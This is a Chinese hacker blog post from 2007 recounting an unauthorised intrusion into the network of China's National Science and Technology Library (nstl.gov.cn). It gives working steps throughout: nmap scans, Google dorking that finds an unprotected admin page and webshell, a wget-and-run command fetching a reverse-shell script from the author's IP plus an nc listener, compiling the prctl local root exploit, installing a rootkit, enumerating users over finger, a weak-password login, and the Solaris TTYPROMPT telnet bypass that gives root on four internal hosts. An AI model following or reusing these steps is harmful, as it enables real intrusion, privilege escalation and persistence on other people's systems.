渗透国家科技图书文献中心网络群

    [晴 October 20, 2007 23:40 | by ]
作者:cnbird[H.U.C]

大家好,我是cnbird[H.U.C]。今天给大家带来的内容比较恐怖了,虽然是我自己觉得,但是相信大家看完了以后也会跟我有一样的感

觉了。今天的目标比较大了是国家科技图书文献中心,www.nstl.gov.cn如图1

Highslide JS


它是国务院直接批准的一个虚拟的科技文献信息服务机构,成员单位包括中国科学院文献情报中心、工程技术图书馆(中国科学技术

信息研究所、机械工业信息研究院、冶金工业信息标准研究院、中国化工信息中心)、中国农业科学院图书馆、中国医学科学院图书

馆。网上共建单位包括中国标准化研究院和中国计量科学研究院。中心设办公室,负责科技文献信息资源共建共享工作的组织、协调

与管理。如图2查看了一下IP地址,吓了我一跳,属于国家科委IP范围。

Highslide JS


好了,不吓唬大家了,我们又不搞破坏,我们入侵进去以后我们可以把漏洞帮它补上啊,没事的,只要不做坏事就不会有人来找你

的。

Google搜出隐蔽的shell


首先用nmap扫描一下,我已经成习惯了,先看看开放什么端口和服务吧。Nmap –A –vv www.nstl.gov.cn –P0。因为nmap是基于
ping的,如果ping有响应就开始扫描,我们这里的主机不让ping,可能是有防火墙或者是路由器做了限制,所以我们加个参数-P0。如

图3结果出来了,

Highslide JS



哇是DEC Digital UNIX真有钱啊,佩服佩服,果然是国家机构。大概的看了看几个分站,找到了一个看似可以SQL注入的但是在NBSI

和阿D中都是不能注入的,可惜看来我的技术也就这水平了,试了N多方法都没有找到有漏洞的主机。这个时候我忽然灵光一现,会不

会有什么前辈以前进来过啊,给我们留下过webshell什么的也说不定啊,我们来到google.cn搜索,先搜索一下ASP的小马试试如图4

Highslide JS


结果没有,继续继续,我们输入管理登陆 site:nstl.gov.cn如图5

Highslide JS


有个webadmin,哇靠,没有密码的,直接进来了如图6。

Highslide JS


真晕,直接拿到webshell了,得来全不费工夫,我们继续转了一下,发先了一个c99shell.php的木马,我比较喜欢这个,以下所有的

操作就都在这个上面进行了。如图7。

Highslide JS


轻轻松松拿root权限拿到了webshell以后我们查看一下服务器的版本,输入uname –a;id得到的版本为2.6.9的,这个版本的本地提

权利用代码很多。

Highslide JS


下面我就详细的来讲解一下如何拿到的root权限。首先我们查看一下perl是不是安装上了,因为我们需要用到comeback.pl这个反弹

shell的小工具,如图9,

Highslide JS


perl安装上了,wget同时也安装上了,这下就好说了。我们在webshell里面输入wget 121.16.35.232/comeback.pl -

P /tmp;perl /tmp/comeback.pl我把2个命令结合到一起了这样可以节省版面。如图10


Highslide JS


我们成功的下载并且执行了,具体的用法是这样的,首先得到本地的IP地址为121.16.35.232,如图11,

Highslide JS


然后在本地也就是自己的机器里面输入

nc –vv –l –p 12345。最后我们在webshell里面执行perl /tmp/.code/comeback.pl 121.16.35.232 12345如图12,13


Highslide JS


Highslide JS



成功反弹回来本地shell。

下面的工作就是要提权了,我们从milw0rm.com下载现在非常流行的prctl漏洞利用程序。我们来看nsfocus.net怎么描述prtcl这个漏洞

的吧。Linux Kernel是开放源码操作系统Linux所使用的内核。

Linux Kernel的prctl()调用在处理Core Dump时存在漏洞,本地攻击者可能利用此漏洞提升自己的权限。

prctl()调用允许未授权进程设置PR_SET_DUMPABLE=2,因此当发生段错误时产生的core文件将被root用户拥有。本地用户可以创建

恶意程序,将core文件dump到正常情况下无权写入的目录中。这可能导致拒绝服务(磁盘耗尽)或获得root权限。

Nsfocus.net描述的地址为http://www.nsfocus.net/vulndb/9006,漏洞利用程序下载地址为

http://www.milw0rm.com/exploits/2006到时候我会把用到的

代码全部打包的。如图14,

Highslide JS


我们已经下载好了,直接编译吧,我们输入gcc prtcl2.c –o local –static –Wall如图15,

Highslide JS


我们已经编译好了。我们输入./local等待大约有2分钟的时候我们输入id,哇靠,你看看吧,这就成root了,太esay了吧。

Highslide JS


哈哈已经拿到root了,赶紧下载了一个Rootkit,具体的文章请参考黑客防线第八期的Linux后门系列--由浅入深sk13完全分析。这里就

不详细的讲解了。同时我们安装了捕获数据的sebek这个软件,以后我会跟大家详细讲解如何使用sebek捕获数据的。



扩大战果


到这里也许你就认为结束了,但是我认为这是一个开始而已。我们输入ifconfig –all查看一下ip地址,如图17

Highslide JS


我们得到了这台服务器的IP地址为168.160.1.114,那么我们就来看看这个IP段到底有多少台机器吧。我们输入nmap,呵呵这台机器

没想到自带,不用我费劲安装了,我们输入nmap –sP 168.160.1.0-255  如图18,

Highslide JS


我们得到了大量的存活主机。果然是国家投资啊,真有钱,SUN Microsystems的机器有4台,cisco路由器有5台,防火墙2个,

windows操作系统的一台,Alteon Networks3台,未知的有N台。这个网络可真庞大啊。我们先来用nmap扫描扫描SUN

Microsystems的机器试试吧,IP地址为168.160.1.101哇靠,开放的端口真不少,如图19。

Highslide JS


貌似我又回到了初学黑客技术的时候了。操作系统为 Sun Solaris 7 (SPARC)开放了79的端口。我们来试试用户列表吧,我们输入

finger 0@168.160.1.101呵呵得到了不少的用户列表,

Highslide JS


有trip,zhuxh,chychao,fengc,我们用N年前的老技术看看有没有弱口令

吧,哇靠,还真让我找到了一个fengc密码fengc,直接登陆上去,如图21,

Highslide JS


可惜是普通用户权限,没有安装gcc,不能用本地的exp提权漏洞了。没事的,我们知道2000年的时候sun os操作系统出现了N多的


RPC漏洞,都是能直接拿root权限的,不会2000年的漏洞现在都有吧。首先介绍一下sunos 的rpc机制,远程过程调用(RPC)是一个

协议,程序可以使用这个协议请求网络中另一台计算机上某程序的服务而不需知道网络细节。(过程调用有时也称作函数调用,或子

例行程序调用。)RPC使用client/server模型。请求程序是client,而服务提供程序则为server。就像一般的本地过程调用一样,RPC是

一个同步操作,直到远程过程结果返回请求程序才可以挂起。尽管如此,使用轻质进程或线程时,它们共享同一地址空间,是允许多

个RPC并发执行的。这里就简单的讲解一下,大家想了解具体的细节请参考google。RPC监听的端口是111,我们可以利用系统自带的

命令rpcinfo来查看一下Sun操作系统开了什么RPC服务,因为RPC服务有很多都有漏洞的,开了不少远程RPC的。如图22,

Highslide JS


我把有可能有漏洞的都画出来了。提示:具体的漏洞代码大家可以来这里下载

http://www.linux.com.cn/hack.co.za/exploits/daemon/rpc/

index.html 我们试了几个如图23,

Highslide JS


果然不是吃素的,漏洞都补上了。但是没有关系的,因为Sunos操作系统的漏洞太多了。

我们知道sunos操作系统的/bin/login 无需任何身份验证即可远程非法登录,漏洞描述Solaris 2.6, 7, 和8的 /bin/login 存在一个漏洞,

可以通过环境变量TTYPROMPT绕过其验证。 利用此漏洞进行的攻击并不要求远程攻击者编译任何的攻击代码,只要求在telnet里将

环境变量TTYPROMPT简单定义成长度为6的字符串,然后一旦连接上远程主机,只要输入用户名,后面紧跟64个"c"和一个字面上的

回车"\n",即可以无需任何口令验证直接登陆到系统上。而且如果系统设置允许root用户远程登陆,将可以以root用户登陆,获得其

控制权限。 需要注意的是,这并不是一个新的安全漏洞,它其实是System V Login 缓冲区溢出漏洞的另外一种利用方法 。由于

telnetd存在一个潜在的安全隐患:接受远程客户端传递过来的TTYPROMPT变量,并将其传递给/bin/login程序。当攻击者远程或者

本地修改传递给login的TTYPROMPT变量时,将导致在发生“System V系统Login远程缓冲区溢出漏洞”时,可以覆盖一个与认证状

态有关的重要变量,导致无需身份认证即可登录。
      
好了,我们从milw0rm.com上下载了漏洞利用代码下载地址为http://www.milw0rm.com/exploits/716,我们把下载下来的代码编

译,如图24,

Highslide JS


这里我已经编译好了,用的命令是gcc telnet2.c –o telnet就可以了,我们输入./telnet看一下如何使用吧。如图25,

Highslide JS


我们知道了以后,我们直接输入./telnet –h 168.160.1.101如图26,

Highslide JS


哇,我们直接拿到了168.160.1.101的root权限了。用同样的方法,我也拿到了其他的3个Sunos的系统root权限,如图27。

Highslide JS



总   结


    到这里我就不想继续的入侵下去了,一方面是因为害怕,另外一方面是因为内网的漏洞太多了,还有2台mysql密码为空,当然了

外网是不能访问的。因为cisco做了限制的原因。
      
     其实我入侵进去也是运气的成分,首先利用google.cn搜索到webshell->拿到本地的root权限->用nmap扫描出存活主机->继续

渗透->成功拿到4台sunos操作系统root权限。
      
     其实入侵的过程中还有不足的地方,就是没有成功的拿到cisco权限,因为我拿到了sunos的root权限也是不能远程登陆的,还要

利用这台Linux的机器作跳板再进入到其他的机器。显然很麻烦,现在我正在学习cisco的入侵方法,等有研究成果了第一个拿出来发

到黑防上。希望大家多关注黑防。886。
Tags: , ,
Technology | Comments(0) | Trackbacks(0) | Reads(9573)
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive